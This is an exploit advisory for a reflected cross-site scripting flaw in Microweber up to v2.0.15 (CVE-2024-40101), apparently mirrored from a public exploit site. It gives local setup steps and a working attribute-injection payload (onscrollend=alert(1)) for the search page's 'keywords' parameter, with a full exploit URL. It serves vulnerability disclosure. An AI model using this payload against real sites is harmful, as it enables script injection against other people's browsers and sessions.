Share
## https://sploitus.com/exploit?id=PACKETSTORM:179921
# Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)  
# Date: 16.07.2024  
# Exploit Author: Prerak Mittal  
# Vendor Homepage: https://microweber.org/  
# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15  
# Version: <=v2.0.15  
# Tested on: Ubuntu 22.04  
# CVE : CVE-2024-40101  
  
# Description:  
## App Installation:  
1. Clone the repository and build the application using docker:  
```  
git clone -b v2.0.15 https://github.com/microweber/microweber.git  
cd microweber  
docker compose up -d  
```  
2. Visit http://localhost  
3. Follow along the UI installation process.  
  
## Steps to reproduce:  
  
1. Visit http://localhost/search  
2. Insert the below payload in `keywords` parameter:  
"onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"  
  
Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22  
  
3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.